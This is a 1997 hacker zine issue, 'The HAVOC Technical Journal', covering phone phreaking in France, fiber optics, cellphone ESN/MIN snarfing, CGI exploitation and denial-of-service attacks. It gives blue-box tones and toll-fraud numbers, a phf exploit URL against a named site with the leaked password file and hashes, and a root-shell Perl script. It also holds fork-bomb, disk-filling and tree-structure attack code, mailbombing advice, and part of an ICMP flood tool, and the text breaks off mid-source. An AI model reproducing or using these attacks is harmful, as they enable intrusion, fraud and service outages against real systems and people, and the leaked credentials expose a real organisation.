ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³The HAVOC Technical Journal ³± ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± Vol. 1 | No.8 | March 1st, 1997 | A HAVOC Bell Systems Publication HBS: "we're ereet" _____________________________________________________________________________ Inside this issue: Whats new this issue.............................. Editorial.........................................Scud-O Blue Boxing in France Pt. II......................memor Fiber Optics......................................Keystroke evilempire.org....................................Scud-O Snarfing..........................................FuScAT CGI Insecurities Part III.........................Scud-O Denial Of Service Attacks.........................Scud-O The 'g0d' Project.................................Scud-O RTFM: UNIX Basics................................. HBS............................................... Next Month........................................ ---------------------------------------------------- evilempire.org - the future of hbs - comming soon! ---------------------------------------------------- ___________________________________________________________________ Editorial by Scud-O First off, I want to apologize for the poor quality of issue 7. I was worried that it would not be 100k, so I added some crap, and I know that I shouldn't have. This is NOT what you have or should come to expect from HBS and The HAVOC Technical Journal in particular. Anyway, next month KungFuFox is going to guest edit, and Keystroke and disc0re will help him collect articles and distribute them. I am going to be ram-rodding thtj down everyone's throat, and getting more and more people to read thtj. This break will from editing will allow me to get back on track with school, and focus more so that I can write better articles. Issue 8 has gone fairly well, I am proud of it, and I think it is one of our greatest yet. However, only a few people contributed to it, so I have worked extra hard on my articles, especially the Denial Of Service article, which I feel is probably the best writing I've done so far. So read it and tell me what you think. This issue may even tie or beat issue 6 as our best issue ever. I'll be getting the web page fixed up, adding the files page, getting linux installed on my computer again, getting the ISP ready, raising funds for the ISP, getting my ICMP project done, and getting HBScript aka mIRC HAVOC Bell Systems version 1.0 done. Hopefully somewhere in there I'll still have time for a life and fun. geez... just saying it all makes me tired.... ---------------------------------------------- / ---/ --/ / / | /------/ / / /--- /-----/------/-----/ / / / /----------/ -of HAVOC Bell Systems- /--------/ "The eLiTe lammah!" FoxMulder@worldnet.att.net | http://www.geocities.com/SiliconValley/8805 "You're Spiro Agnew and I'm the Dick you answer to." - 'Boom' , Bloodhound Gang with Rob Van Winkle ___________________________________________________________________ French Phreaking & Blueboxing. By memor 1.1 *** French Phreakers Politics. 1.11 Teletel Network In France. 1.12 Warez Business & Phreaking. 1.2 *** Type Of Phone Numbers In France. 1.21 Local & National Highly Dangerous # Numbers. 1.22 0800 Dangerous Free # Numbers. 1.23 080090xxxx & 080091xxxx Free BlueBoxing # Numbers. 1.24 1800 & Operators # Numbers. I --- French Phreaking & Blueboxing. 1.1 *** French Phreakers Politics. French phreaking scene is mostly using lame Calling Card (was using it because now with the Cartes Pastelles (pastels cards)) , calling card made by France Telecom it is hardest to fraud (361010) and law are now really bad with Carders.. Credit or Calling. Blueboxing dude are not searched by cops and/or France Telecom so that make us having some little skills in Blueboxing. 1.11 Teletel Network In France. Well first Use of bluebox was to come on the Teletel Network (explained in bif.txt) that 3615 network is really expensive and slow (1200bds-v23) so we had (when we were young) to use bluebox for connecting it and staying on really long times (like how we are doing on irc now) , personnaly i used that for connecting 3615 RTEL , a server which was talking about computers, cracking and computers selling. note: nua of RTEL is 020803506031801 France____]\/[__________Server RTEL. city nammed rennes________| Rtel is still alive, it uses videotex terminals (you can get it on ftp.minitel.fr or ftp.ibp.fr) , and you must have a modem which knows v23 (for USR sportster v23 is ATS34=8 ATZ) 1.12 Warez Business & Phreaking. The paradox team (France) was using calling card for accessing somes BBS in usa and downloading Super Ninterdo Games, PC and Amiga Warez.. but their calling cards died, so they fastly learnt bluebox for making their business living again.. they were bluboxin to usa for dlding games and selling it in France.. they all got busted. 1.2 *** Type Of Phone Numbers In France. 1.21 Local & National Highly Dangerous # Numbers. The local phone numbers, numbers that u must pay at the connection opening (0.73FF ... 5$US=1FF) and after u have to pay a taxe/min like 0.23FF/min so that phone are not really interesting for blueboxing because u still pay something.. well maybe interesting for calling an another country but for calling somewhere in france, thats not interesting at all, National Phone numbers are same (0.73FF at connection opening) but after , you pay more. Well.. you want to bluebox on that phone number, ok you are a good phreaker, you scan and u pass all the filters of the french system.. you find frequencies like: Freq1 : voice1:2700 voice2:2650 lenght:130ms delay:10ms Freq2 : voice1:2570 voice2:2430 lenght:300ms delay:10ms After , you redial in France for calling that hospital : Dial_Seq:A0380293031C local_]\/[___________________________Hospital Number of dijon For calling Provence Now france is divided in parts like A01 <- Paris A02 <- Province (East of France) A03 <- South Of France / Province Well you can call another country via or Routine Code Dial_Seq:A001(USA PHONE NUMBER)C A00 is for calling a foreign country or via Dial_Seq:B01(USA PHONE NUMBER)C B for an international call. But well if a company or someone you bluebox on ask France Telecom about a fraud, France telecom uses for his local/national phone numbers a big loging (1 month loging for each phone number) which is written Who Call <-> Who is Called <-> Lenght <-> Date / Times 11111111 - 222222222 - 3Hours - 25/12/96 / 00:00 22222222 - B01xblahxC - 2H59Mn - 25/12/96 / 00:01 11111111 is you so u can be located.. be careful.. numbers really dangerous. 1.22 0800 Dangerous Free # Numbers. 0800 numbers are free phone numbers in france , same method for blueboxin on like France local/national phone numbers , but same danger. 1.23 080090xxxx & 080091xxxx Free BlueBoxing # Numbers. That ones are more more interesting, because they are free phone numbers but for calling anothers countries.. like calling KornFlex(USA) from a 080090xxxx , with that ones, you can call... most of the countries like Perou, Chili, USA, Canada(0800908026), UK, DE ,... Well you can bluebox on it , but you must know the frequencies of the countrie. like for coloumbia: Freq1:2600 Freq2:2550 lenght:150ms delay:10ms Freq1:2400 Freq2:2350 lenght:300ms delay:10ms dial in CCITT#5 ... coloumbia in not really interesting , because you can only phone in local coloumbia ... BxxxxC will sux... only AxxxxxC works if you dont try to use a routine code, it will hang up to busy if you try that. No logs on that numbers. 1.24 1800 & Operators # Numbers. 1800 numbers are free for calling foreign countries operators but i know it is not logged , so its "safe" to blueboxe on it, i know some person which do that (Dominicana Republic) from their home,We scanned Chili with a friend at home, well the sure thing is that we are not busted and we did that 1 month ago. Dominicana Republic died 5-6 months ago. Now some numbers for Calling France Direct (A french operator) for free from your countries: Argentina 0033800999111 Australia 1800881330, 180055144(ccs) Austria 022903033 Belgium 080010033, 080010330 Brasil 0008033 Canada 18003634033, 18004636226(ccs) Chili 123003331 China 10833(big cities only) Colombia(1)980330057 Colombia(2)980330010(ccs) Korea 0090330, 003933 Denmark 80010033 Dom.Rep 18007510600 EAU 8001133 Finland 980010330 Gabon 00033 Germany 0130800033 Greece 008003311 Hawaii 18008653313 HK 8000033, 80003311(ccs) Hungary 0080003311 Iceland 8009033 Indonesia 001801331 Ireland 1800551033, 1800550033(ccs) Israel 1773302727 Italy 1720033 Japan(1) 0039331, 0031005533(ccs) Japan(2) 004422333333(ccs) Lux. 08000033(ccs) Malaysia 8000033(ccs) Morocco 002110033 M.i. 73331 Mexico 98800332001 Norway 80019933 New-Cal. 000933 New-Zel. 000933 UK(1) 0800890033 UK(2) 0500890033(ccs) Spain 900990033 Sweden(1) 020799033 Sweden(2) 020799133(ccs) Uruguay 000433 USA(1) 18005372623, 18009372623 USA(2) 180047372623(ccs), 18008727835(ccs) USA(3) 18007278350(ccs), 18002510841(ccs) ___________________________________________________________________ Fiber Optics by Keystroke I explained the first main fiber optic project in my last article for HAVOC (the TAT-8). Here, I will try to give you a brief overview of fiber optic communications. Fiber Optics Communications Fiber Optics Communications or lightwave communications A typical fiber optics communications system consists of three basic components: 1. Optical Transmitter 2. Optical fiber 3. Optical Receiver 4. Havoc (Optional) The transmission of information over a distance using optical fiber usually requires several steps. First, the the info is converted into an electrical signal (if it is not already in that form). Second, the electrical signal is changed into an optical signal w/ the help of an optical source. Third, the optical signal is transmitted through the optical fiber. Fourth, the optical signal is detected and converted into an electrical signal with the help of an optical detector. Finally, the signal processing is done. Below are some more specific optical fibers, recivers, etc Electrical Interface - Electrical Modulator, encoder, multiplexer, etc. Optical transmitter - Led, laser diode optical fiber - Monomode step index fiber, multimode step-index fiber, multimode graded index fiber Optical receiver - pin diode, apd, photo transistor, photo darlinton electrical interface - electrical demodulator, decoder, demultiplexer, etc. Theoretically, an optical signal with a wavelength of 1 micrometer, a bandwidth of 300 THz is possible. Presently, the maxium bandwidth is only 10 Gbps :p Monomode step index is best for long haul projects (less transmission loss) while multimode is better for short haul (more loss, but also more speed) There are 3 types of optical fiber: Monomode step index fiber, multimode step-index fiber, and multimode graded index fiber. There are many benifits of fiber optic communication: Large Bandwidth (explained above) Small size and weight (tens of micrometers smaller than the diameter of a human hair and MUCH smaller and lighter than copper (sic) cables) Dielectric construction - No ground lops are required (no external electromagnetic fields) Low transmission loss - (monomode fibers loose .2 db/km multimode 1db/kb - not many repeaters necessary) EMI & RFI immunity - No cross talk because there is no generation of electrical or electromagnetical noise or interfierence Signal security - Optical fibers do not radiate energy. Can't be tapped in a non-intrusive manner. (Military and banks use them) High reliability and durability - cant corrode - cant oxidize - can be used in explosive or nuclear enviroment Now to compare optical sources LED vs. Laser Diode Spectral width Large 30-40 nm Narrow 1 - 2 nm Modulation bandwidth 1 Gbps 6 -10 Gbps Insertion loss 10 -15 db 3 db Output power 1 -5 mW 5 - 15 mW Life expectancy 100 million hours 1 million hours Temperature Sensiviaty Tolerant Sensitive Beam divergence Large Narrow Cost Low High Optical Detectors PIN (P-type Intrinsic, N-type) APD Sensitivity Low High Cost Low High Temp. Sensitiv. Tolerant Sensitive Bias Voltage Low (10-50 V) High (100-300 V) As you can see, fiber optic communication is far superior to what is in use today in the majority of the world (copper wire). - Keystroke ___________________________________________________________________ evilempire.org -------------- evilempire.org login HBS Unix 5.0 -=- linux kernel 1.3.20 User: Password: ------------------------------------- Imagine........ evilempire.org is to be the future of HBS, our up and coming ISP. We are currently filing for the domain with InterNIC, and plan for Defraz to run a simple vdomain for us until we get minos ( the ISP computer) built. evilempire.org will start up with at least 2gb of space or so, and we will expand as we need to, and as funds allow. we plan for the computer to be co-located ( basically this means at an ISP's building, with a t1 connection) but with a modem and a line to for my internet access, and possibly psych0's if he pays me. We will be offering accounts for a low fee, which will help us cover the cost of start up ( hopefully about only 1000$) and the monthly cost of start up ( about 300$ a month). As we get more and more users, accounts will get cheaper, as we will only be usng the money to pay for the monthly fees and the costs to upgrade hardware, etc. When we start, we will have 1gb of space for users, since about 1gb will be used for linux and misc software, FTP files, newsgroups, etc. However, if we can piggy back off of the ISP that will run us, we may use their newsgroups and then offer more space to users. We currently need at least 30 users to make this happen, so i am offering the following, The first 35 to 40 people that sign up, i will give you slashed prices on accounts when i have more people using the service, and will make your accounts free if i make enough to cover for your accounts. And, as i gain users, i will start to offer different accounts if people say, only want to run a bot or two on the account, i will lower the price. As of 3-3-97 Our pricing plan: ---------------------------------------------------- $5/mo email + newsgroups $10/mo full shell $15/mo secured shell * $5/mo bot account only $10/yr for each 10mb after the quota limit $15/yr FTP account ** * a secured account will offer more leanancy if you use the server to run attacks on servers, etc. However, we WILL suspend your account if you abuse IRC and i get e-mails that if you do not stop, they will ban our domain. I AM NOT going to get evilempire.org banned from every IRC server out there!!! ** The FTP accounts will assure that you can get the files you need, since we plan to have a LARGE file collection, but only about 5 anonymous FTP's at a time. All shell accounts come with this. All shells come with: CGI-BIN, all UNIX stuff, many IRC progs, tons of DOS attackers, FTP access, mailbombers, allowed to run bots, and about 20-50+ mb of space! ------------------------------------------------------------------- We plan to get the server up be June or July, so send in the money soon if you want a premium account! E-mail me at: FoxMulder@worldnet.att.net for more information, and since our PO Box is not up yet. evilempire.org PO Box XXXX Sykesville, MD 21784 heh computers: limbo: (current computer) 486/66 ( was a 50, pushed to 66) 8 mb ram 245 md ide hd 1 gb scsi hd 2x cd-rom 28.8 modem minos: ( future computer at co-location) 486/100 16mb ram 2 gb ide hd probably no cd drive 28.8 modem (maybe) 10mbps ethernet card connected to t1 line lucifer(?) ( future computer at my house) pentimum 200 (mmx?) 32-64mb ram 2-9gb hd ( ide or scsi) 8x-12x cd-rom 28.8 modem 10mbps ethernet (and another for limbo) ( after the site us up and we have money, we will uprade to probably a pentium 200 Pro or so, with 64-128 mb ram, several gigs hd, SCSI to support the hard drives, etc. Then maybe some day i will get a t1 right into the server and run ti at my house! (not likely) ) ___________________________________________________________________ Gettin the Digits by FuScAT (*** ed note: although this article does not go as indepth as i had hoped, it none the less give you a good over view of 'snarfing' ***) Basically we are dealing with the concern of obtaining Electronic Serial Numbers (ESN’s) and Mobile Identification Numbers (MIN’s) for reprogramming cellular fones. Really there are about three basic ways to go about doing this that I am currently aware of. If you Know of any other please let me know about them. First: Social Engineering You could call up your cell provider and ask for a service man to come take a look at your fone. They will give you a name and say he will be there shortly. Then about 10 minutes later call the provider back pretending to be the service man they just sent out, and with the proper jargon and know how you can squeeze the info out of them. Really not very affective and frankly probably more of a waste of time... Second: A CellScope Its a fairly simple few pieces of hardware and software consisting of a cellfone, a palmtop pc(or laptop), the proper software, and an antenna. Basically the cellfone is used to scan the channels and frequencies of the cell sites, when a number in use is displayed on the screen from the software you can lock in on it and the warez will snag the ESN & MIN for you leaving it in plain english for you to use..VERY PRACTICAL but highly unaffordable. (unfortunately cus Im sure we would ALL love to have one), and oh yea only usable by law enforcement agencies or private detectives...(grin) Finally Modified Scanner There is a way to modify a handheld police scanner to do virtually the same thing the CellScope’s cellfone does. You can make a few (quiet a few) modifications to your scanner to make it scan the cellular frequencies. Now you will also need the hardware for this, being the connector cable you will need to connect your scanner to your pc or laptop. Then with the the right software and the know how you will be able to snag ESN’s & MIN’s If I am mistaken in any way PLEASE correct me...and if anyone knows of other ways to get the digits please let us know... --FuScAT ___________________________________________________________________ CGI Insecurities Part III.........................Scud-O ---------------- NOTE: HBS brings it to you first! We started on CGI weaknesses in October, phrack brought CGI weaknesses in December! (sorry, just had to gloat a little!) ---------------- Well, this is the final chapter in my three part series of CGI Insecurities, and this will probably be the most useful parts of the whole series, since you can use these holes in scripts that are out there running. This part of the article covers many topics, but it also focuses mostly on shell escapes. Many cgi ( especially perl scripts) use calls to unix commands (mostly sendmail or mail) to get simple serivces done. Shell escapes: Many, many,many CGI scripts are vunerable, since they use mail, or even sendmail (what the hell is wrong with those CGI scripters? dont they know that sendmail has holes?). Using for example ~ or other shell escape codes, it is possible to get a shell on the remote systems to cause heh, HAVOC! Sendmail is also a BIG hole here, since sendmail holes can be cracked and exploited by the CGI program. system() : Another big weakness is the gold old system call, which i presented in issue 6 (however that was for c, but the basics are the same). If you find a system(), or even an exec() call, you can modify the html document by, if you use nutcrape (im not covering IE, since it is the devil!) by clicking, view, then document source, then change the CGI to system("command_to_run") , (command_to_run of coursing being the comand you want to use) save the file, relaod nutscrape, and use it. Depending on how the CGI is coded, you might need to add the sites address here and there, but i will leave that to you. fun: Another way to get the password file, is similar to the file i did way back in issue 4, but this is a hidden input tag ( normally used to store information from page to page, much like 'cookies' do) which sends you an email with the passwords. ex: This then, sends you the password file. phf: ----------- This bug is pretty common knowledge now, but basically, you enter the following: http://site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd This then returns to you, a copy of the password file. If you dont believe me, that something like that could be so simple, try perrier.com . I got this when i tried: --------------------------------------------------------------

Query Results

/usr/local/bin/ph -m alias=X /bin/cat /etc/passwd

root:WnDFHddnKu28M:0:1:system PRIVILEGED account:/:/bin/csh
nobody:*Nologin:65534:65534:anonymous NFS user:/:
nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/:
daemon:*:1:1:system background account:/:
bin:*:3:4:system librarian account:/bin:
uucp:Nologin:4:2:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
uucpa:Nologin:4:2:uucp adminstrative account:/usr/lib/uucp:
auth:*:6:11:Authentication Subsystem:/tcb/bin:
cron:*:7:14:Cron Subsystem:/usr/adm/cron:
lp:*:8:12:Line Printer Subsystem:/users/lp:
tcb:*:9:18:Trusted Computing Base:/tcb:
adm:*:10:19:Administration Subsystem:/usr/adm:
ris:Nologin:11:21:Remote Installation Services Account:/usr/adm/ris:/bin/sh
locker:Nologin:12:15:locker:/usr/users/locker:/bin/sh
per-surv:Nologin:204:1:Perrier Survey Email address:/opt/per-surv:/bin/csh
calvert:Nologin:205:1:Calvert Deforest Email address:/opt/calvert:/bin/false
thebrains:Nologin:206:1:jrap Email address:/opt/jrap:/bin/false
jrap-surv:Nologin:207:1:jrap survey addr:/opt/jrap:/bin/csh
footlocker:Nologin:208:1:footlocker survey:/opt/footlocker:/bin/csh
ftp:*:500:25:Anonymous FTP user:/data/web/public/ftp:/bin/false
eds:RbaQ09DoC7MXg:501:26:EDS FTP user:/data/clients/eds:/bin/false
unprod:mD8.fz9LD.Tw6:210:32:unproductions FTP user:/data/web/public/calvert:/bin/false
bardhl:pm59ch9LkeaqY:211:33:Bardahl FTP User:/data/web/public/bardahl:/bin/false
---------------------------------------------------------------------------- Pretty slick no? Anyway, have fun cracking their passwords..... one last thing.... -------------------------- exploit.pl This script while only 4 lines of code, gives you (or who ever runs this script) a shell to do, well what ever you please. #!/usr/bin/perl $ENV{PATH}="/bin:/usr/bin"; $>=0;$<=0; exec("/bin/bash"); ---------------------------------- I want to thanks all of you for reading this, and I want to give thanks for the knowledge of CGI and its weaknesses, and thanks to memor for telling me to try out phf on perrier.com.... Scud-O ___________________________________________________________________ [The Modern Guide to Denial of Service Attacks] History and Modern Uses by Scud-O Denial of Service (DOS) Attacks are nothing new. Many old versions of UNIX would crash with this little bit of code if an administrator did not see all the processes running. main() { while(1) fork(); } I remember crashing a few systems with this little prog, and a system will go down fast if this is not seen by an admin. Basically this program spawns ( or forks) another process of it self which then spawns more, and so on. This is a total attack since all of the chold processes are waiting for new processes to be established, so even if you kill one process, another will take its place. However, most current versions of UNIX are immune to this attack since users are limited to a maximum number of processes (except root). Most UNIX versions have the max number of processed buitl into the kernel, but Solaris for example lets the value ( MAXUPROC) be set at boot time, in etc/system under set maxuproc=100 (or whatever the sysadmin has set it to be). However, if you have several accounts on a system, or have some friends with accounts, you all can take down the system by running the program. Having too many processes is a great challenge for sysadmins to fix without having to reboot the system, since: a) You can not run ps to determine what process numbers to kill, and b) if you are not logged in as super user, yuo cannot use su or login because both of these functions require the creation of a process, which, if you system is overloaded, is impossible. However, most sysadmins do not want to shut down their system by just flicking off the power, since virtually no systems are designed to undergo a fast, orderly shutdown when quickly powered off. And sysadmins know that hitting the power is not good for the disk, since it may lose disk blocks, and it will not flush the buffers to disk, thus losing any unsaved work. So admins are left to randomly killing processes, or if their system supports it, doing a kill -TERM -1 , which sends a SIGTERM to all processes except superuser processes and system processes. ________________ Disk Attacks: Another old method of attack is the old disk attacks, such as filling up the hard disk, or tree-structures, bot presented below. Hidden Space: This is a form of attack that will work very well as long as the computer it is on is run 24 hours a day. Basically the sample bit of code below creates and keeps a file open, thus making it invisible to du or find, yet still takeing up space. This is due to the fact that unlinked files are not in the directory tree, yet they still take up space. filename: fillup.c #include #include main() { int ifd; chat buf[8192]; ifd= open("./attack", O_WRITE| O_CREAT, 0777); unlink("/.attack"); while(1) write(ifd,buf, sizeof9buf)); } This little program, after creating the file, runs an infinite loop, which continues to fill up disk space, and stops anything from being worked on since the disk will be filled up. Try using a ls or du to see the file and it will not be there, causing the sysadmin some confusion. That is unless they have a copy of lsof on hand, or they kill the process or all processes. Now to make this go faster, always run this in the background, and then run a few more copies just for good measure. * HINT: one way to get this to work faster, is to add a fork() call in the program, thus making it run multiple copies, and filling up the drive faster. ----------------- Tree-scructure attacks These are actually quite lame and weak, but they can still cause some problems, since a tree could be made that is too deep to be deleted by rm. (HINT: for a very good attack, combine this and the attack up above, to make a huge directory with huge files!) a sample shell script that makes these directories and fills them up is below: $!/bin/ksh $ $ Dont try this at home, unless you are quite foolish! while mkdir anotherdir do cd ./anotherdir cp /bin/cc fillup done On many systems rm- r just cannot delete trees this big, since they can overflow buffers or limits on the number of filenames or open directories at one time. using chdir you can delete them manually, but this is quite boring so most admins would just write a script to do this. (e-mail me if you need the script) ------------ /tmp On many UNIX systems out there today, both users and programs can create files of unlimited size in the /tmp directory for temporary usage. Now, you can simply about this vunerability by using the fillup.c or tree structure progs above and fill up the /tmp dir and conscequentally fill up the entire disk. ------------------ Network Attacks: ------------------ Okay, you are proably saying, hey great, i have these methods to attack a local system i have an account on, but what about remote systems that i may not have an account on? well, thanks to daemon9 and other coders out there, there is an abundancy of remote DOS attacks. We are also lucky, to date no firewall really protects from a DOS attack, but watch that change soon. With all the hype and press about DOS atacks on ISPs, firewalls will soon be able to block DOS. For daemon9's article on TCP/SYN flooding, either a) goto http://www.geocities.com/SiliconValley/8805/files.html and scroll down to 'phrack' and click on issue 48 b) goto http://freeside.com/phrack.html and scroll down to past issues and get issue 48 c) or ftp.fc.net/pub/phrack/ and get phrack 48 You will want article 13 which is Project Neptune by daemon9. daemon9 gives a great indepth analisys of TCP/SYN flooding and offers a great C program to attack systems. Now the basic info on TCP/SYN flooding presented here is nowhere near as informative as daemon9's since i have not spend as much time on it as he has. What is below is a very simple explaination of the basic if the flood. First, we need to see a simple connection. TCP uses a 3 way hand shake to start up a conversation. ex: A B ---------> SYN <--------- SYN/ACK ---------> ACK Now if A is the client computer and B is the host, A sends a SYN to B, and B replies with a SYN/ACK , This tells the client that the server acknologizes the connection and then the client replies with an ACK, which says that it acknologizes the connection as well, and the connection is made. While a SYN is waiting to be processed, it sits in a backlog queue, waiting for the host to see it. Here is where the flood comes in. Since UNIX creates a backlog to prevent several SYNs filling up the memory ( which would make our job so much faster), we must fill up the queue. If you use a general IP Spoofer, (or the code in phrack 48) you can use it to make your connection appear to be coming from the spoofed IP, which MUST be unreachable so it cannot send a RST command. Basically, the client sends a SYN to the host, the host tries to reply, but it sends it to the spoofed IP, and since the IP will not respond, it will continue trying to make a connection, until it times out. So if you run several SYNs to a hosts port that you want to block, you can quickly fill up the queue, making the port dead, since it can handle no more connections. For code that does this, see phrack 48. -------------------- SMTP floods: -------------------- These are very simple to do, since STMP will pretty much accept just about anything that comes their way. I did a simple mailbomber in issue 7, so use that to mailbomb a server, try common accounts like postmaster@site or info@site, etc, and send the system either several VERY large files to fill up disk space, or many,many small mails to flood the STMP server with e-mails, and thus making it unusable. ----------------------------- ICMP_ECHO floods: ----------------------------- These attacks are some of the most common, since they are often used by IRC users to 'kill' other users, and thus many people i know are getting k-lines and nasty messages from sysadmins who are pissed that someone from undernet or another irc server has e-mailed them about you. Anyway, below is some sample code that Keystroke had, and although he will be pissed that i am adding it here, i am, so tough shit Key! (heh) This code may also be the basis of my ICMP killer win95 program i will be developing during the coming months, ( wish me luck on porting this from UNIX to Win95) Basically tthe following code works, since UNIX systems will reply to ICMP requests continually, not realizing that it may be halting the system by replying to what the system thinks are simple ICMPs. Now adding an IP spoofer to this setup, only makes things better since the computer will time out while trying to get a reply from these ECHOs while new ECHOs are also hitting the system, thus totally killing the system. ------------------------------------------- /* * echok.c * ICMP_ECHO Killer * * Author: Zakath Credits: LOTSA thanks to crisk * Don't be fooled. Very little is my orig code. * [03.13.96] */ #define RESOLVE_QUIET #define IPHDRSIZE sizeof(struct iphdr) #define ICMPHDRSIZE sizeof(struct icmphdr) #include #include #include #include #include #include #include #include #include #include #define ECHOK_VER "1.4" /* GENERAL ROUTINES ------------------------------------------- */ void banner(void) { printf("\n * ICMP ECHO Killer [v%s] - by Zakath *", ECHOK_VER); printf("\n * Code based on works by Crisk & Mike Muuss *\n\n"); } void usage(const char *progname) { printf("\nusage:\n "); printf("%s [-f <-n number>] [-s packet size] [-w wait] \n\n",progname); printf("\t-f : enable flooding (ping -f)\n"); printf("\t-n : number of pings to send\n"); printf("\t-s : ICMP_ECHO Packet Size [Default is 64]\n"); printf("\t-w